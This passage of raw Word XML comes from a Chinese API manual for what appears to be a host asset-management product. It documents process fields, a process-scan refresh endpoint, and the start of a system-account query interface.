              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D7057C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13FE7773" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11837AE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C0E57A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D450E1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3B38C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>会话id, 仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27B0A83C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24393725" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42053B0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DB6DC1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B26B9BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>会话名，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6156F042" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F32C317" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1973132A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB2E282" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA89487" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程类型，1-应用程序 2-后台程序 3-windows进程，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A464CA7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F4BFF6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0192BE36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7597C746" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AC4C855" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程描述，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29CFC1F3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05F79277" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05BA9303" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A67AE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC6058D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程用户组，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="418D3752" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="225044F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C71BE32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="329A6C8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6942C505" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程可执行文件大小，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61900AD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc115166093"/>
      <w:bookmarkStart w:id="38" w:name="进程信息扫描"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t>进程信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="6DFCFA4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求进程信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B4327" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBE74A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/process/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A14DD99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85F6A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753FD66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2CE370" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/process/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311DE7B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E97B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591F3194" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBDDC66"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3ABD0288" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>返回部分</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="321BABE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016EE35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ABD0FB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1210BC9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2720D86E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E0EFE23" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A9D95AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A83FDDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74AEF653" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="772CD5B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70382A8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc115166094"/>
      <w:bookmarkStart w:id="40" w:name="进程信息查询扫描状态"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:t>进程信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="35C55903" w14:textId="6252B9A0" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询进程信息的扫描状态；具体请求方式参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="资产通用查询扫描状态">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>资产通用查询扫描状态</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF4903E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc115166095"/>
      <w:bookmarkStart w:id="42" w:name="系统账号信息"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:t>系统账号信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="374E97A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CC8B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该功能API用于查询资产中的系统账号信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C2523" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68398CB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>系统账号信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D798D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240EC2C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655303E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC92A21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>系统账号信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6207D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>系统账号信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D35A09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>系统账号信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7231D512" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC81084" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用系统账号信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E9742" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D89D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D7577" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc115166096"/>
      <w:bookmarkStart w:id="44" w:name="系统账号信息查询结果"/>
      <w:r>
        <w:t>系统账号信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="77A01BFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询系统账号信息，按每台主机每个账号进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545E96DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCEBA75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/account/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D4055A"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548"/>
        <w:gridCol w:w="1329"/>
        <w:gridCol w:w="598"/>
        <w:gridCol w:w="6607"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B831E3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4DE2848" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39BC4326" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0668DF5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="004D2B4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10861E42" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602BC7E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AA0C48F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54A15B0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2E9E92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DA07B95" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
